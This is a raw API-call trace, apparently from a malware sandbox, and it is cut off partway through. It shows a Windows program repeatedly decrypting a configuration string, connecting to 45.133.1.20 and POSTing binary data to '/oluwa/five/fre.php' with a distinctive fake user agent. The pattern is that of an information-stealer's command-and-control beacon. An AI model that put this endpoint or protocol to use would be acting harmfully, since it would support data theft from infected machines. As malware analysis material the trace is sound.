LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.427] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.428] GetProcessHeap () returned 0x6a0000 [0258.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0258.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.429] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0258.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.431] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0258.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.432] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0258.432] GetProcessHeap () returned 0x6a0000 [0258.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.433] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.436] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.437] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.437] GetProcessHeap () returned 0x6a0000 [0258.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0258.441] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.442] GetProcessHeap () returned 0x6a0000 [0258.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0258.442] GetProcessHeap () returned 0x6a0000 [0258.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.443] GetProcessHeap () returned 0x6a0000 [0258.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0258.443] GetProcessHeap () returned 0x6a0000 [0258.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0258.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0258.478] GetProcessHeap () returned 0x6a0000 [0258.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0258.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.482] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0258.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.484] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.487] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.487] GetProcessHeap () returned 0x6a0000 [0258.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0258.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.492] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0258.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.494] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0258.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.495] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0258.495] GetProcessHeap () returned 0x6a0000 [0258.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.496] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0258.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.498] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0258.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.500] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0258.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.501] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0258.501] GetProcessHeap () returned 0x6a0000 [0258.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0258.501] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0258.502] GetProcessHeap () returned 0x6a0000 [0258.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0258.502] socket (af=2, type=1, protocol=6) returned 0x8bc [0258.502] connect (s=0x8bc, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0258.524] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0258.524] GetProcessHeap () returned 0x6a0000 [0258.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0258.524] GetProcessHeap () returned 0x6a0000 [0258.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0258.525] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.526] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.526] GetProcessHeap () returned 0x6a0000 [0258.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dc758 [0258.526] GetProcessHeap () returned 0x6a0000 [0258.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.526] GetProcessHeap () returned 0x6a0000 [0258.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0258.526] GetProcessHeap () returned 0x6a0000 [0258.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0258.527] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.528] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.528] GetProcessHeap () returned 0x6a0000 [0258.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0258.528] GetProcessHeap () returned 0x6a0000 [0258.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.529] send (s=0x8bc, buf=0x6bd460*, len=242, flags=0) returned 242 [0258.530] send (s=0x8bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0258.530] GetProcessHeap () returned 0x6a0000 [0258.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0258.530] recv (in: s=0x8bc, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0258.593] GetProcessHeap () returned 0x6a0000 [0258.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0258.594] GetProcessHeap () returned 0x6a0000 [0258.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0258.595] GetProcessHeap () returned 0x6a0000 [0258.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc758 | out: hHeap=0x6a0000) returned 1 [0258.596] GetProcessHeap () returned 0x6a0000 [0258.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0258.596] closesocket (s=0x8bc) returned 0 [0258.597] GetProcessHeap () returned 0x6a0000 [0258.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0258.597] GetProcessHeap () returned 0x6a0000 [0258.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.597] GetProcessHeap () returned 0x6a0000 [0258.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0258.598] GetProcessHeap () returned 0x6a0000 [0258.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0258.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15ec) returned 0x8bc [0258.601] Sleep (dwMilliseconds=0xea60) [0258.602] GetProcessHeap () returned 0x6a0000 [0258.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0258.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0258.618] GetProcessHeap () returned 0x6a0000 [0258.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0258.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.619] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0258.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.621] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.622] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.622] GetProcessHeap () returned 0x6a0000 [0258.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0258.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.624] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0258.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.625] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0258.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.626] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0258.626] GetProcessHeap () returned 0x6a0000 [0258.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.627] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.628] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.629] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.630] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.630] GetProcessHeap () returned 0x6a0000 [0258.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0258.630] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.630] GetProcessHeap () returned 0x6a0000 [0258.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0258.634] GetProcessHeap () returned 0x6a0000 [0258.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.638] GetProcessHeap () returned 0x6a0000 [0258.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0258.639] GetProcessHeap () returned 0x6a0000 [0258.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0258.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0258.662] GetProcessHeap () returned 0x6a0000 [0258.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0258.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.663] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0258.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.665] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.667] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.667] GetProcessHeap () returned 0x6a0000 [0258.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0258.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.669] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0258.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.670] CryptDestroyKey (hKey=0x6ad020) returned 1 [0258.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.671] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0258.671] GetProcessHeap () returned 0x6a0000 [0258.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.673] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0258.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.674] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0258.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.678] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0258.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.679] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0258.679] GetProcessHeap () returned 0x6a0000 [0258.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0258.679] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0258.679] GetProcessHeap () returned 0x6a0000 [0258.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0258.680] socket (af=2, type=1, protocol=6) returned 0x8c0 [0258.680] connect (s=0x8c0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0258.708] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0258.708] GetProcessHeap () returned 0x6a0000 [0258.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0258.708] GetProcessHeap () returned 0x6a0000 [0258.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0258.710] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.710] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.710] GetProcessHeap () returned 0x6a0000 [0258.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dcb18 [0258.711] GetProcessHeap () returned 0x6a0000 [0258.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.711] GetProcessHeap () returned 0x6a0000 [0258.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0258.711] GetProcessHeap () returned 0x6a0000 [0258.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0258.712] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.713] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.713] GetProcessHeap () returned 0x6a0000 [0258.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0258.713] GetProcessHeap () returned 0x6a0000 [0258.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.714] send (s=0x8c0, buf=0x6bd460*, len=242, flags=0) returned 242 [0258.714] send (s=0x8c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0258.715] GetProcessHeap () returned 0x6a0000 [0258.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0258.715] recv (in: s=0x8c0, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0258.802] GetProcessHeap () returned 0x6a0000 [0258.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0258.803] GetProcessHeap () returned 0x6a0000 [0258.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0258.803] GetProcessHeap () returned 0x6a0000 [0258.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcb18 | out: hHeap=0x6a0000) returned 1 [0258.803] GetProcessHeap () returned 0x6a0000 [0258.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0258.804] closesocket (s=0x8c0) returned 0 [0258.804] GetProcessHeap () returned 0x6a0000 [0258.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0258.804] GetProcessHeap () returned 0x6a0000 [0258.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.805] GetProcessHeap () returned 0x6a0000 [0258.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0258.805] GetProcessHeap () returned 0x6a0000 [0258.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0258.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15f0) returned 0x8c0 [0258.829] Sleep (dwMilliseconds=0xea60) [0258.833] GetProcessHeap () returned 0x6a0000 [0258.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0258.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.835] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.856] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0258.863] GetProcessHeap () returned 0x6a0000 [0258.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0258.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.867] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0258.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.868] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.869] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.869] GetProcessHeap () returned 0x6a0000 [0258.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0258.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.871] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0258.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.872] CryptDestroyKey (hKey=0x6ad520) returned 1 [0258.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.873] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) 